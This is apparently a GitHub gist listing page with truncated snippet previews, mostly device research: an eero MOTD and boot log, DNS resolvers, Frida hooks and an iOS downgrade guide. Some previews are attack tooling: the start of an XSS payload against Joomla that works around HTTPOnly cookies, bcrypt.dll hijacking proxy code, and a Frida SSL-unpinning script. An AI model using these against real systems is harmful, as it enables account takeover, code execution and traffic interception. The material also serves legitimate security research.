Skip to content

Instantly share code, notes, and snippets.

View markuta's full-sized avatar

Naz Markuta markuta

7 followers · 0 following
View GitHub Profile
@markuta
markuta / motd.sh
Created June 16, 2024 17:57
Message of the day from eero device firmware
#!/bin/sh
_motd(){
cat << 'EOF'
_____
_-- --_
/ ___ \
welcome to / -- -- \
___ ___ _ __ ___ / ___ \___
/ _ \/ _ \ '__/ _ \ / _ \/ __/
@markuta
markuta / resolvers.txt
Created March 1, 2024 16:40
A list of public DNS resolvers.
1.0.0.1
1.1.1.1
134.195.4.2
185.228.168.9
185.228.169.9
195.46.39.39
195.46.39.40
205.171.2.65
205.171.3.65
208.67.220.220
@markuta
markuta / networking.js
Created December 8, 2023 20:46 — forked from zihadmahiuddin/networking.js
A Frida script for native networking functions (getaddrinfo, connect, send and recv)
console.log("Loading script...");
var getaddrinfoPtr = Module.findExportByName(null, 'getaddrinfo')
var connectPtr = Module.findExportByName(null, 'connect')
var sendPtr = Module.findExportByName(null, 'send')
var recvPtr = Module.findExportByName(null, 'recv')
var getaddrinfoFunction = new NativeFunction(getaddrinfoPtr, 'int', ['pointer', 'pointer', 'pointer', 'pointer'])
var connectFunction = new NativeFunction(connectPtr, 'int', ['int', 'pointer', 'int'])
var sendFunction = new NativeFunction(sendPtr, 'int', ['int', 'pointer', 'int', 'int'])
@markuta
markuta / frida-struct-pointer-pointer.js
Created December 8, 2023 19:27 — forked from schirrmacher/frida-struct-pointer-pointer.js
Frida: How to read a struct or a struct pointer or a pointer of a struct pointer?
/*
typedef struct {
int size;
char* data;
} test_struct;
void some_func(test_struct **s);
@markuta
markuta / httponly.js
Last active October 31, 2023 11:39
Exploiting XSS with HTTPOnly type Cookies
// Source: https://www.shorebreaksecurity.com/blog/xss-exploitation-with-xhr-response-chaining/
// This is a modfied example from the above link. It is used for Joomla
try {
var site = "http://localhost:8080";
// Create an XHR object for each request
var csrf = new XMLHttpRequest();
var user = new XMLHttpRequest();
//var role = new XMLHttpRequest();
@markuta
markuta / serial.log
Created June 13, 2023 23:35
eero 6 (gen 3) boot log
Format: Log Type - Time(microsec) - Message - Optional Info
Log Type: B - Since Boot(Power On Reset), D - Delta, S - Statistic
S - QC_IMAGE_VERSION_STRING=BOOT.XF.0.3-00089-IPQ60xxLZB-2
S - IMAGE_VARIANT_STRING=IPQ6018LA
S - OEM_IMAGE_VERSION_STRING=crm-ubuntu20
S - Boot Interface: eMMC
S - Secure Boot: On
S - Boot Config @ 0x000a602c = 0x000002e3
S - JTAG ID @ 0x000a607c = 0x001390e1
@markuta
markuta / fake-bcrypt.cpp
Last active May 15, 2023 17:45
Sample C++ code for DLL hijacking/proxying using bcrypt.dll
#include "pch.h"
/* Forward All Bcrypt.dll exports */
#pragma comment(linker, "/export:BCryptAddContextFunction=C:\\windows\\system32\\bcrypt.BCryptAddContextFunction,@1")
#pragma comment(linker, "/export:BCryptAddContextFunctionProvider=C:\\windows\\system32\\bcrypt.BCryptAddContextFunctionProvider,@2")
#pragma comment(linker, "/export:BCryptCloseAlgorithmProvider=C:\\windows\\system32\\bcrypt.BCryptCloseAlgorithmProvider,@3")
#pragma comment(linker, "/export:BCryptConfigureContext=C:\\windows\\system32\\bcrypt.BCryptConfigureContext,@4")
#pragma comment(linker, "/export:BCryptConfigureContextFunction=C:\\windows\\system32\\bcrypt.BCryptConfigureContextFunction,@5")
#pragma comment(linker, "/export:BCryptCreateContext=C:\\windows\\system32\\bcrypt.BCryptCreateContext,@6")
#pragma comment(linker, "/export:BCryptCreateHash=C:\\windows\\system32\\bcrypt.BCryptCreateHash,@7")
@markuta
markuta / checkm8_downgrade.md
Created January 1, 2023 12:28
How to downgrade checkm8 devices from iOS 15/16

Important: Please don't use the comment section to ask for help, I most likely won't respond there as I have it muted due to too many notifications. Join r/jailbreak (#genius-bar) or FDR Bureau (#futurerestore-support) instead.

How to downgrade checkm8 devices from iOS 15/16

This is a guide for downgrading (or upgrading) to unsigned versions with futurerestore on checkm8 devices (A11 and below). You must have blobs for the version you want to go to, and SEP/BB compatibility may limit how far you can go.

Current SEP compatibility

The latest SEP/BB as of right now is iOS 16.0, which is INCOMPATIBLE with anything below. On devices that got iOS 16, you must use 15.6 RC SEP/BB.

@markuta
markuta / unpin.js
Created December 27, 2022 21:54 — forked from JJTech0130/unpin.js
Disable SSL pinning using Frida
// Disables SSL pinning by replacing functions with no-ops.
function unpin() {
var SecTrustEvaluate_handle = Module.findExportByName('Security', 'SecTrustEvaluate');
var SecTrustEvaluateWithError_handle = Module.findExportByName('Security', 'SecTrustEvaluateWithError');
var SSL_CTX_set_custom_verify_handle = Module.findExportByName('libboringssl.dylib', 'SSL_CTX_set_custom_verify');
var SSL_get_psk_identity_handle = Module.findExportByName('libboringssl.dylib', 'SSL_get_psk_identity');
var boringssl_context_set_verify_mode_handle = Module.findExportByName('libboringssl.dylib', 'boringssl_context_set_verify_mode');
if (SecTrustEvaluateWithError_handle) {
var SecTrustEvaluateWithError = new NativeFunction(SecTrustEvaluateWithError_handle, 'int', ['pointer', 'pointer']);